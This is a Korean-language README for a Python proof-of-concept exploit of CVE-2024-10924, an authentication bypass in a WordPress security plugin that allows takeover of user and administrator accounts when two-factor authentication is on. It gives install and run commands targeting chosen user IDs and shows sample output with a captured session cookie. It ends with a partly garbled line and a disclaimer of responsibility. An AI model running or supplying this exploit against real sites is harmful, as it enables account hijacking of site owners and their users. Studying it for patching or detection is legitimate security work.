
Python으로 작성된 CVE-2024-10924용 POC
Really Simple Plugins WordPress 플러그인(9.0.0~9.1.1.1 버전 포함)의 REST API에 있는 오류 처리 결함으로 인해, 이중 인증(Two-Factor Authentication)이 활성화된 경우 공격자가 인증을 우회하고 기존 사용자 또는 관리자 계정을 장악할 수 있습니다.
저는 좋은 사람이므로, 플러그인 9.1.1.1 버전도 함께 준비했습니다. 압축을 풀고 wp-content/plugins 폴더에 업로드하기만 하면 됩니다. 플러그인을 활성화하고 2FA를 활성화하는 것을 잊지 마세요.
pip를 사용하여 필요한 종속성을 설치합니다:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
특정 사용자 ID 지정:
python exploit.py -id 10 http://localhost:8886/
이 명령은 사용자 ID가 10인 익스플로잇 페이로드를 전송합니다.
사용자 ID를 지정하지 않는 경우:
python exploit.py http://localhost
사용자 ID가 기본적으로 1로 설정됩니다.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False)을 비활성화하세요.잘 모르겠지만, 어떤 것에 대해서도 책임을 지지 않습니다.